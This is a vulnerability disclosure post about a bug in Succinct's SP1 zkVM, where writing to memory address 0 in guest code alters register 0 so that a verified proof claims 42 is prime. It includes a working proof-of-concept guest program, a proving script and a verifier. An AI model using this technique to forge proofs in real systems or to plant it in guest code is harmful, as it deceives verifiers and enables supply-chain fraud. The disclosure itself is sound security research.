The future of ZK is in RISC-V zkVMs, but the industry must be careful: how Succinct's SP1's departure from standards causes bugs

The future of ZK is in RISC-V zkVMs, but the industry must be careful: how Succinct's SP1's departure from standards causes bugs

Why you should avoid having complex codebases and departing from standards when developing zero-knowledge virtual machines

TL;DR: We found a subtle bug in Succinct's SP1 virtual machine, which allows a malicious user to prove the validity of false statements by subtly manipulating register 0 in the guest code

This was found thanks to a collaboration between 3MI Labs, Aligned, and LambdaClass.

LambdaClass and Fuzzing Labs will invest in further investigating critical security bugs in zkvms. We believe that codebases have become too complex and over-engineered and this gives rise to lots of bugs. We think that the industry is at risk if we do not invest, add more eyes and simplify codebases. The industry has become complacent when it comes to security and is being pushed by business decisions to rush into production use, leaving aside these security issues, which could lead to very serious consequences. In this post, we analyze the case of SP1, but we think that all zkvm's codebases need to be simplified and follow the standards, lowering the attack surface. As mentioned, we will conduct a more thourough research on different zkvms.

Introduction

We have seen the development of long and complex codebases in several engineering projects, with too many features and poor documentation and testing. Some people believe that having such codebases shows that you are smart, have excellent coding skills, and have given a lot of thought to everything. We think otherwise: the proof of mastery lies in simplicity. Bugs will always happen in any project, but the chance of having critical bugs increases with codebase complexity and length in a nonlinear way: the longer and more complex, the more bugs and hard-to-predict behaviors you can have.

During our analysis of zk virtual machines and proof systems, we found a bug in Succinct's SP1 virtual machine, which allows a malicious actor to generate a valid proof of malicious programs (proving that a false statement is true). We disclosed our concerns to Succinct's team, and they replied that this was within their security assumptions and is currently included in their documentation:

We discussed these issues with several auditors and concluded that the most important thing is that this deviation was well-documented and communicated, so we're updating our docs to reflect that. We do not believe this is a security concern since programs proven in our zkVM are already assumed to be well-formed and not malicious. In other words, while you can prove the execution of the malicious program, the resulting proof is meaningless if the program is corrupt.

We like Succinct's work and think their virtual machine has sparked a lot of good competition to improve current zkvm designs and helped show that the future of ZK is in RISC-V virtual machines. We have been playing and experimenting with it a lot and are considering using it in some of our projects. We also liked that they responded fast to our findings, and although we disagreed with their criteria, they took our concerns seriously.

From our point of view, this bug arises from a departure from the RISC-V specs and the complexity of the codebase. We think that more care needs to be taken when designing, developing, and testing zk virtual machines that could be used in real-world applications, and try to minimize the attack surface by not going into unchartered territory.

Description of the bug

This example shows that an SP1 proof can be glitched with an appropriately targeted memory write. We will use this to prove that 42 is prime using a simple primality test:

// Returns if divisible via immediate checks than 6k ± 1.
// Source: https://en.wikipedia.org/wiki/Primality_test#Rust
fn is_prime(n: u64) -> bool {
    if n <= 1 {
        return false;
    }
    if n <= 3 {
        return true;
    }
    if n % 2 == 0 || n % 3 == 0 {
        return false;
    }
    let mut i = 5;
    while i * i <= n {
        if n % i == 0 || n % (i + 2) == 0 {
            return false;
        }
        i += 6;
    }
    true
}

Using the following guest program (using i/o is unnecessary for the bug):

pub fn main() {
    let what: u8 = sp1_zkvm::io::read();
    let where_: u32 = sp1_zkvm::io::read();

    let n = sp1_zkvm::io::read::<u64>();

    // We can have a little write, as a treat
    unsafe {
        *(where_ as *mut u8) = what;
    }
    let is_prime = is_prime(n);

    sp1_zkvm::io::commit(&n);
    sp1_zkvm::io::commit(&is_prime);
}

Then the proving script is executed,

//! A program that takes a number `n` as input and writes if `n` is prime as an output.
use sp1_sdk::{utils, ProverClient, SP1Stdin};

// Generated with `cargo prove build --docker --elf-name is-prime-write --output-directory elf`
// in the program directory
const ELF: &[u8] = include_bytes!("../../../program/elf/is-prime-write");
const FILENAME: &'static str = "is-prime-write.proof";

fn main() {
    // Setup a tracer for logging.
    utils::setup_logger();

    // Generate and verify the proof
    let client = ProverClient::new();
    let (pk, vk) = client.setup(ELF);
    // Create an input stream and write '29' to it
    let n = 42u64;

    let mut stdin = SP1Stdin::new();
    stdin.write(&1u8); // what
    stdin.write(&0u32); // where
    stdin.write(&n);

    let mut proof = client.prove(&pk, stdin).compressed().run().unwrap();
    let _ = proof.public_values.read::<u64>();
    let is_prime = proof.public_values.read::<bool>();
    println!("Is {n} prime? {}", is_prime);
    client.verify(&proof, &vk).expect("verification failed");
    proof.save(FILENAME).expect("saving proof failed");
}

This program reads three inputs: the content of the memory write (what), the target address of the memory write (where), and a number for primality testing. (It also contains the ELF compiled version as program/elf/is-prime-write.). Register 0 should always be zero, and cannot be changed according to RISC-V specs. Due to the bug, we can change it in the guest code, making statements that should be false to change to true.

After performing the memory write of the given content at the given address, the program tests whether the given input n is a prime number. The is_prime() function in main.rs(./program/src/main.rs) is a correct primality test that should return false on input 42. The program finally commits to the input n that it was given, as well as the result of the primality test; these are the public values displayed by the verifier binary, showing that the is_prime() function incorrectly returned true when the program's input was 42.

The script directory contains the minimal rust binary verifier.rs(./script/src/bin/verifier.rs), which verifies that the proof given in script/is-prime-write.proof declares that 42 is a prime number. This can be checked by running the following commands.

cd script/
cargo run
//! A program that takes a number `n` as input and writes if `n` is prime as an output.
use sp1_sdk::{utils, ProverClient, SP1ProofWithPublicValues};

// Generated with `cargo prove build --docker --elf-name is-prime-write --output-directory elf`
// in the program directory
const ELF: &[u8] = include_bytes!("../../../program/elf/is-prime-write");
const FILENAME: &'static str = "is-prime-write.proof";

fn main() {
    // Setup a tracer for logging.
    utils::setup_logger();

    // Generate and verify the proof
    let client = ProverClient::new();
    let (_, vk) = client.setup(ELF);

    // Verifier code
    let mut deserialized_proof =
        SP1ProofWithPublicValues::load(FILENAME).expect("loading proof failed");

    // Verify the deserialized proof.
    client
        .verify(&deserialized_proof, &vk)
        .expect("verification failed");

    // Now that it's accepted
    let n: u64 = deserialized_proof.public_values.read();
    let is_prime: bool = deserialized_proof.public_values.read();
    println!("Verifier: Is {n} prime? {is_prime}");
}

While this example is naïf (since we can easily see that 42 is not prime due to it being an even number), this idea could be exploited for more subtle attacks, including supply chain attacks. While the change in the guest program is pretty obvious in this case, in others where the codebase is more complex and there are multiple dependencies it can be way harder to detect.
The assumption that programs are always correctly generated and do not have bugs is against common sense in the software industry and could result in serious vulnerabilities. Moreover, departing from well-established standards makes the reasoning over expected behavior difficult and can lead to more complex and subtle bugs.

Summary

Working with 3MI Labs and Aligned, we found a bug in how SP1 handles the memory register (in particular, register 0), which can allow an attacker to prove a false statement. This results from a departure of the RISC-V specs and a complex codebase. This makes reasoning over expected behavior very difficult, as it could also give rise to unexpected and subtle bugs, which can have critical consequences in real-world settings. We must continue testing, analyzing, and trying to find bugs and unexpected behaviors in zk virtual machines to minimize risks when used in real-world use cases.